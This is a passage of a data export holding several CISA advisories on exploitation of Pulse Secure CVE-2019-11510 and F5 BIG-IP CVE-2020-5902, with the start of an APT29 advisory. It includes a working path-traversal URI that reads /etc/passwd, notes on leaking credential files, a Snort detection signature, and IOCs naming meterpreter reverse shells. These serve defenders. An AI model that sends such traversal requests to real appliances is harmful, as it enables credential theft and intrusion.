"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"], 
"modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T15:33:15", "description": "### Summary\n\n_**Note:** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse>) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. 
CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n## Background\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/>) to a victim organization\u2019s network via VPN appliances. 
Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/>) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133>) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021>) for _Lateral Movement_ [[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/>) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486]](<https://attack.mitre.org/versions/v7/techniques/T1486>) for impact, as well as\n * _Exfiltration_ [[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/>) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard-coded to be allowed if the path contains `dana/html5/acc`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5/acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>). 
An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the `data.mdb` object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297>),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests for files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) of plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in open-source proof-of-concept code and in the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password of the VPN appliance. (See figure 1.)\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). 
CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account\n   * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account\n   * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account\n   * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) a user password from the VPN appliance. To do this, CISA created a _user realm_ (Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. 
(**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies_ [[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090>)\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. 
Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services.\n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.)\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as `../../../data` (see figure 6).\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. 
Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse>) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. 
See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing `C:\\Python\\ArcGIS` to house malicious PE files, as well as using natively installed Python.\n * Threat actor attack infrastructure: 38.68.36(dot)112, ports 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrator and service accounts.\n\nCISA also recommends that organizations:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying it into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. 
For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>)\n\n### References\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>)\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>)\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297>)\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>)\n\n[[10] Twitter. 
@alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n### Revisions\n\nApril 16, 2020: Initial Version|October 23, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:34:19", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. 
[[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/>) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPNs through HackerOne.\n * July 31, 2019 \u2013 Full use of the exploit demonstrated, using the admin session hash to get a complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with a detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now 
targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. 
[[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2023-27350"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:32:02", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this alert in response to recently disclosed exploits that target F5 BIG-IP devices that are vulnerable to CVE-2020-5902. F5 Networks, Inc. (F5) released a patch for CVE-2020-5902 on June 30, 2020.[[1]](<https://support.f5.com/csp/article/K52145254>) Unpatched F5 BIG-IP devices are an attractive target for malicious actors. Affected organizations that have not applied the patch to fix this critical remote code execution (RCE) vulnerability risk an attacker exploiting CVE-2020-5902 to take control of their system. **Note:** F5\u2019s security advisory for CVE-2020-5902 states that there is a high probability that any remaining unpatched devices are likely already compromised.\n\nCISA expects to see continued attacks exploiting unpatched F5 BIG-IP devices and strongly urges users and administrators to upgrade their software to the fixed versions. CISA also advises that administrators deploy the signature included in this Alert to help them determine whether their systems have been compromised.\n\nThis Alert also provides additional detection measures and mitigations for victim organizations to help recover from attacks resulting from CVE-2020-5902. CISA encourages administrators to remain aware of the ramifications of exploitation and to use the recommendations in this alert to help secure their organization\u2019s systems against attack.\n\n### Background\n\nCISA has conducted incident response engagements at U.S. 
Government and commercial entities where malicious cyber threat actors have exploited CVE-2020-5902\u2014an RCE vulnerability in the BIG-IP Traffic Management User Interface (TMUI)\u2014to take control of victim systems. On June 30, F5 disclosed CVE-2020-5902, stating that it allows attackers to, \u201cexecute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\u201d\n\nOn July 4, open-source reporting indicated a proof-of-concept code was available and threat actors were exploiting the vulnerability by attempting to steal credentials. On July 5, security researchers posted exploits that would allow threat actors to exfiltrate data or execute commands on vulnerable devices. The risk posed by the vulnerability is critical.\n\n### Technical Details\n\nCISA has observed scanning and reconnaissance, as well as confirmed compromises, within a few days of F5\u2019s patch release for this vulnerability. As early as July 6, 2020, CISA has seen broad scanning activity for the presence of this vulnerability across federal departments and agencies\u2014this activity is currently occurring as of the publication of this Alert.\n\nCISA has been working with several entities across multiple sectors to investigate potential compromises relating to this vulnerability. CISA has confirmed two compromises and is continuing to investigate. 
CISA will update this Alert with any additional actionable information.\n\n### Detection Methods\n\nCISA recommends administrators see the F5 Security Advisory K52145254 for indicators of compromise and F5\u2019s CVE-2020-5902 IoC Detection Tool.[[2]](<https://support.f5.com/csp/article/K52145254>) CISA also recommends organizations complete the following actions in conducting their hunt for this exploit:\n\n * Quarantine or take offline potentially affected systems\n * Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections\n * Deploy the following CISA-created Snort signature, which matches the `..;` (`|3b|`) path-traversal sequence in a GET request URI against the TMUI login page, to detect malicious activity:\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"BIG-IP:HTTP URI GET contains '/tmui/login.jsp/..|3b|/tmui/':CVE-2020-5902\"; sid:1; rev:1; flow:established,to_server; content:\"/tmui/login.jsp/..|3b|/tmui/\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; priority:2; reference:url,github.com/yassineaboukir/CVE-2020-5902; reference:cve,2020-5902; metadata:service http;)`\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their BIG-IP software to the corresponding patches for CVE-2020-5902. If organizations detect evidence of CVE-2020-5902 exploitation after patching and applying the detection measures in this alert, CISA recommends taking immediate action to reconstitute affected systems.\n\nShould an organization\u2019s IT security personnel discover system compromise, CISA recommends they:\n\n * Reimage compromised hosts\n * Provision new account credentials\n * Limit access to the management interface to the fullest extent possible\n * Implement network segmentation\n * **Note:** network segmentation is a very effective security mechanism to help prevent an intruder from propagating exploits or laterally moving within an internal network. Segregation separates network segments based on role and functionality. 
A securely segregated network can limit the spread of malicious occurrences, reducing the impact from intruders that gain a foothold somewhere inside the network.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [CISAServiceDesk@cisa.dhs.gov](<mailto: CISAServiceDesk@cisa.dhs.gov>)\n\n### References\n\n[[1] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[[2] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[CISA Factsheet: Guidance for F5 BIG-IP TMUI Vulnerability (CVE-2020-5902)](<https://www.cisa.gov/publication/guidance-f5-big-ip-vulnerability-fact-sheet>)\n\n### Revisions\n\nJuly 24, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T12:00:00", "type": "ics", "title": "Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", 
"CVE-2023-27350"], "modified": "2020-07-24T12:00:00", "id": "AA20-206A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T15:04:38", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. 
Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. 
